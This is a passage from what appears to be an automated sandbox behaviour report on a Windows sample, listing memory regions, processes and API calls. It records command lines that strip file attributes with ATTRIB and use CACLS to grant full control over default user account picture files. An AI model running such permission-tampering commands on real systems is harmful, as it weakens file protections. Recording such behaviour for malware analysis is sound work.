"private_0x000000007ffdf000" filename = "" Region: id = 26406 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26407 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26408 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 26409 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26410 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26411 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26412 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26413 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26414 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26415 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 26416 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26417 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 531 os_tid = 0x89c Thread: id = 532 os_tid = 0xde0 Process: id = "372" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c40" os_pid = "0xecc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "370" os_parent_pid = "0xd44" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26418 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26419 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26420 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26421 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 26422 start_va = 0xae0000 end_va = 0xae6fff 
entry_point = 0xae0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26423 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26424 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26425 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26426 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26427 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26428 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26429 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26430 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 26431 start_va = 0x200000 end_va = 0x266fff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26432 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 26433 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 
0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26434 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26435 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26436 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26437 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26438 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26439 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26440 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26441 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26442 
start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26443 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26444 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26445 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 26446 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26447 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 533 os_tid = 0xf20 Process: id = "373" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xf70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" 
[0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26448 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26449 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26450 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26451 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26452 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26453 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26454 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26455 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26456 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 26457 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26458 
start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26459 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26460 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26461 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 26462 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 26463 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26464 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26465 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26466 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26467 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26468 start_va = 0x76b40000 
end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26469 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26470 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26471 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26472 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 26473 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26474 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26475 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 26476 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 26477 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 26478 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" 
Region: id = 26479 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 26480 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 26481 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 26482 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 534 os_tid = 0xe70 [0185.506] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fac4 | out: lpSystemTimeAsFileTime=0x16fac4*(dwLowDateTime=0xa3786c80, dwHighDateTime=0x1d440a9)) [0185.506] GetCurrentProcessId () returned 0xf70 [0185.506] GetCurrentThreadId () returned 0xe70 [0185.506] GetTickCount () returned 0x3508f [0185.506] QueryPerformanceCounter (in: lpPerformanceCount=0x16fabc | out: lpPerformanceCount=0x16fabc*=24229533594) returned 1 [0185.507] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0185.507] __set_app_type (_Type=0x1) [0185.507] __p__fmode () returned 0x76b331f4 [0185.507] __p__commode () returned 0x76b331fc [0185.507] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0185.507] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0185.507] GetCurrentThreadId () returned 0xe70 [0185.507] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe70) returned 0x38 [0185.507] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.507] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 
0x769624c2 [0185.507] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.507] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0185.508] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fa54 | out: phkResult=0x16fa54*=0x0) returned 0x2 [0185.508] VirtualQuery (in: lpAddress=0x16fa8b, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.508] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0185.508] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0185.508] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.508] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0185.508] GetConsoleOutputCP () returned 0x1b5 [0185.508] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.508] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0185.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.508] SetConsoleMode (hConsoleHandle=0x7, 
dwMode=0x0) returned 1 [0185.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.508] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.508] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.508] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.509] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.509] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.509] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0185.509] GetEnvironmentStringsW () returned 0x260308* [0185.509] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0185.509] GetEnvironmentStringsW () returned 0x260308* [0185.509] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0185.509] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9c4 | out: phkResult=0x16e9c4*=0x40) returned 0x0 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0xb8, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x1, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x1, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x0, lpcbData=0x16e9c8*=0x4) returned 0x0 
[0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x40, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x40, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x40, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.510] RegCloseKey (hKey=0x40) returned 0x0 [0185.510] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9c4 | out: phkResult=0x16e9c4*=0x40) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x40, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x1, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x1, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x0, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, 
lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x9, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x9, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x9, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.510] RegCloseKey (hKey=0x40) returned 0x0 [0185.510] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886393 [0185.510] srand (_Seed=0x5b886393) [0185.510] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"" [0185.510] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"" [0185.510] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.510] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0185.511] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") 
returned 0x63 [0185.511] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.511] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.511] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0185.511] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0185.511] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0185.511] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0185.511] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0185.511] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0185.511] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0185.511] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0185.511] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0185.511] GetEnvironmentStringsW () returned 0x262458* [0185.511] FreeEnvironmentStringsW (penv=0x262458) returned 1 [0185.511] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.511] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.511] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0185.511] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0185.511] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0185.511] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0185.511] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0185.511] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0185.511] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0185.511] 